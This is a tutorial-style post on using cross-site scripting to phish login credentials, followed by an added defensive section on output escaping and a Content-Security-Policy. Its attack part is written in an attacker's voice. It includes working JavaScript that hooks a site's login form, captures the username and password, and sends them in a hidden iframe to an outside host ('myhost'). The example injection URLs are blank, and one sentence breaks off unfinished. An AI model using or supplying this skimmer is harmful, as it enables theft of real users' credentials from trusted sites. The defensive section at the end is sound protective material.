What is cross-site scripting (XSS)
XSS is certainly changing the way that phishing attacks are perpetrated.
This controversial video is by Brian Contos, CISSP, from a company named Imperva. It walks through each step involved in finding an XSS vulnerability in a web page and showcases some of the basic steps that you need to know.
For example, we have a target such as:
http://Thewebsite.com/google/add.php?request=
Suppose there is a login form and an XSS vulnerability in the same page.
In order to perpetrate the phishing attack, one needs to inject JavaScript code into the variable so that the victim's browser loads a JavaScript file.
From a brief analysis of the HTML that the site generates, I know that:
• The value that the variable “request” receives is not sanitized at all.
• The login form is named “login_clientes”.
• The login form has two input fields for user data: “user” and “pass”.
So I will use the following JavaScript code:
    // Reference to the page's login form
    loginForm = document.forms['login_clientes'];

    // Runs on submit: reads the typed values, then lets the submit continue
    function parseData()
    {
        var username = loginForm.user.value;
        var password = loginForm.pass.value;
        saveData(username,password);
        return true;
    }

    // Passes the values to another host through a hidden iframe
    function saveData(username,password)
    {
        var frame=document.createElement('iframe');
        frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" + password;
        frame.style.display='none';
        document.body.appendChild(frame);
    }

    // Hook the handler onto the form's submit event
    loginForm.onsubmit = parseData;
So, if a victim browses a page like the following (don’t forget to encode the injected part):
http://Thewebsite.com/google/add.php?request=
the victim will give you his personal data, as long as he clicks the Submit button.
The ideas that you must have in mind are:
• If you can make the user's browser load your JavaScript file or code when visiting some site, you can change that site's behavior.
• If some site has forms and XSS vulnerabilities, you can try to get the data the user inputs.
• If the user trusts the site, the user will probably give his personal data anywhere in that site.
And if the site has vulnerabilities in some page where it doesn’t have forms, and has some form(s) in other page(s).
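
On the defensive side, the flaw described above (the “request” value echoed without any sanitization) is closed by encoding the value for HTML output, backed by a Content-Security-Policy that keeps scripts, frames and form posts on the site's own origin. The following is an added example, not code from the original post: the function names, the page template and the sample input are hypothetical, and plain JavaScript stands in for whatever add.php does on the server.

```javascript
// Added example: hypothetical names standing in for what add.php does with
// the "request" parameter. The sample input below is constructed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that let a value break out of HTML element
// content or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical page template: echoes the parameter above the login form.
function page(echoed) {
  return '<p>Request: ' + echoed + '</p>\n' +
    '<form name="login_clientes" method="post">' +
    '<input name="user"><input name="pass" type="password"></form>';
}

// "Before": the parameter is copied into the markup unchanged, so any tag
// it contains becomes part of the page.
function renderVulnerable(request) {
  return page(request);
}

// "After": the parameter is encoded for the HTML context it lands in and is
// displayed as text instead of being parsed as markup.
function renderSafe(request) {
  return page(escapeHtml(request));
}

// Defence in depth: if injected markup still slips through somewhere, the
// browser refuses inline scripts, script files and frames from other hosts,
// and form posts that leave the site's own origin.
function securityHeaders() {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; frame-src 'self'; form-action 'self'",
  };
}

// Constructed sample input: harmless markup is enough to show the difference.
const SAMPLE = '<u>marker</u> & "quoted"';

console.log(renderVulnerable(SAMPLE)); // tag reaches the page as markup
console.log(renderSafe(SAMPLE));       // tag reaches the page as text
console.log(securityHeaders());
```

The policy string only takes effect once the server sends it as a response header on every page, including pages that have no forms of their own.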